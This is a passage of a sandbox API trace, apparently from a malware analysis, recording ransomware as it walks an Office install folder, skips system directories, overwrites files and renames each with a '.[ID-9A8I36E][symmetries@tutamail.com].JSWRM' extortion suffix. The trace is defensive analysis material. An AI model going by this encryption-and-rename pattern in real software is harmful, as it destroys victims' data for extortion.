office\\root\\office16\\pubwiz\\post98sp.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POST98SP.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\post98sp.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0142.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0142.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0142.428] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233a8be5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233a8be5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x233cee41, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa194b, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="POSTCARD.DPV", cAlternateFileName="")) returned 1 [0142.428] lstrcmpiW (lpString1="POSTCARD.DPV", lpString2=".") returned 1 [0142.428] lstrcmpiW (lpString1="POSTCARD.DPV", lpString2="..") returned 1 [0142.428] lstrcmpiW (lpString1="POSTCARD.DPV", lpString2="...") returned 1 [0142.428] lstrcmpiW (lpString1="POSTCARD.DPV", lpString2="windows") returned -1 [0142.428] lstrcmpiW (lpString1="POSTCARD.DPV", lpString2="recovery") returned -1 [0142.428] lstrcmpiW (lpString1="POSTCARD.DPV", lpString2="perflogs") returned 1 [0142.428] lstrcmpiW (lpString1="POSTCARD.DPV", lpString2="documents and settings") returned 1 [0142.428] lstrcmpiW (lpString1="POSTCARD.DPV", lpString2="$RECYCLE.BIN") returned 1 [0142.428] lstrcmpiW (lpString1="POSTCARD.DPV", lpString2="system volume information") returned -1 [0142.428] lstrcmpiW (lpString1="POSTCARD.DPV", lpString2="msocache") returned 1 [0142.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0142.428] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCARD.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCARD.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTCARD.DPV", lpUsedDefaultChar=0x0) returned 12 [0142.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0142.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0142.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCARD.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCARD.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTCARD.DPV", lpUsedDefaultChar=0x0) returned 12 [0142.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0142.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0142.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0142.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0142.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCARD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcard.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.430] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=661835) returned 1 [0142.430] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0142.430] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.443] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.443] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0142.444] CloseHandle (hObject=0x238) returned 1 [0142.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0142.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0142.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0142.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0142.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0142.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0142.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.444] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCARD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcard.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCARD.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcard.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0142.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0142.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0142.446] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233cee41, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233cee41, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2341b2ec, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9a98, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="POSTCARD.XML", cAlternateFileName="")) returned 1 [0142.446] lstrcmpiW (lpString1="POSTCARD.XML", lpString2=".") returned 1 [0142.446] lstrcmpiW (lpString1="POSTCARD.XML", lpString2="..") returned 1 [0142.446] lstrcmpiW (lpString1="POSTCARD.XML", lpString2="...") returned 1 [0142.446] lstrcmpiW (lpString1="POSTCARD.XML", lpString2="windows") returned -1 [0142.446] lstrcmpiW (lpString1="POSTCARD.XML", lpString2="recovery") returned -1 [0142.446] lstrcmpiW (lpString1="POSTCARD.XML", lpString2="perflogs") returned 1 [0142.446] lstrcmpiW (lpString1="POSTCARD.XML", lpString2="documents and settings") returned 1 [0142.446] lstrcmpiW (lpString1="POSTCARD.XML", lpString2="$RECYCLE.BIN") returned 1 [0142.446] lstrcmpiW (lpString1="POSTCARD.XML", lpString2="system volume information") returned -1 [0142.446] lstrcmpiW (lpString1="POSTCARD.XML", lpString2="msocache") returned 1 [0142.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0142.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCARD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCARD.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTCARD.XML", lpUsedDefaultChar=0x0) returned 12 [0142.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0142.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0142.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCARD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCARD.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTCARD.XML", lpUsedDefaultChar=0x0) returned 12 [0142.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0142.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0142.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0142.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0142.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCARD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcard.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.447] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=39576) returned 1 [0142.447] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9a90) returned 0x27b348 [0142.448] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x9a90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x9a90, lpOverlapped=0x0) returned 1 [0142.451] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.451] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x9a90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x9a90, lpOverlapped=0x0) returned 1 [0142.451] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0142.451] CloseHandle (hObject=0x238) returned 1 [0142.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0142.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0142.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0142.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0142.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0142.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0142.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0142.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0142.452] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCARD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcard.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCARD.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcard.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0142.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0142.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0142.453] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2341b2ec, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2341b2ec, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2341b2ec, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2407a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="POSTCD11.POC", cAlternateFileName="")) returned 1 [0142.453] lstrcmpiW (lpString1="POSTCD11.POC", lpString2=".") returned 1 [0142.453] lstrcmpiW (lpString1="POSTCD11.POC", lpString2="..") returned 1 [0142.453] lstrcmpiW (lpString1="POSTCD11.POC", lpString2="...") returned 1 [0142.453] lstrcmpiW (lpString1="POSTCD11.POC", lpString2="windows") returned -1 [0142.453] lstrcmpiW (lpString1="POSTCD11.POC", lpString2="recovery") returned -1 [0142.453] lstrcmpiW (lpString1="POSTCD11.POC", lpString2="perflogs") returned 1 [0142.453] lstrcmpiW (lpString1="POSTCD11.POC", lpString2="documents and settings") returned 1 [0142.453] lstrcmpiW (lpString1="POSTCD11.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.453] lstrcmpiW (lpString1="POSTCD11.POC", lpString2="system volume information") returned -1 [0142.453] lstrcmpiW (lpString1="POSTCD11.POC", lpString2="msocache") returned 1 [0142.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0142.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCD11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCD11.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTCD11.POC", lpUsedDefaultChar=0x0) returned 12 [0142.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0142.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0142.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCD11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POSTCD11.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POSTCD11.POC", lpUsedDefaultChar=0x0) returned 12 [0142.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0142.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0142.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0142.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0142.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCD11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcd11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.455] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=147578) returned 1 [0142.455] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x24070) returned 0x2501e8 [0142.455] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x24070, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x24070, lpOverlapped=0x0) returned 1 [0142.466] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.466] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x24070, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x24070, lpOverlapped=0x0) returned 1 [0142.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0142.466] CloseHandle (hObject=0x238) returned 1 [0142.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0142.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0142.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0142.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.466] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0142.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0142.466] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0142.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0142.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0142.467] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCD11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcd11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\POSTCD11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\postcd11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0142.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0142.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0142.468] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233cee41, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233cee41, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23467797, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa84e8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="POSTCD98.POC", cAlternateFileName="")) returned 1 [0142.468] lstrcmpiW (lpString1="POSTCD98.POC", lpString2=".") returned 1 [0142.468] lstrcmpiW (lpString1="POSTCD98.POC", lpString2="..") returned 1 [0142.468] lstrcmpiW (lpString1="POSTCD98.POC", lpString2="...") returned 1 [0142.468] lstrcmpiW (lpString1="POSTCD98.POC", lpString2="windows") returned -1 [0142.468] lstrcmpiW (lpString1="POSTCD98.POC", lpString2="recovery") returned -1 [0142.468] lstrcmpiW (lpString1="POSTCD98.POC", lpString2="perflogs") returned 1 [0142.468] lstrcmpiW (lpString1="POSTCD98.POC", lpString2="documents and settings") returned 1 [0142.468] lstrcmpiW (lpString1="POSTCD98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.468] lstrcmpiW (lpString1="POSTCD98.POC", lpString2="system volume information") returned -1 [0142.468] lstrcmpiW (lpString1="POSTCD98.POC", lpString2="msocache") returned 1 [0142.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0142.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 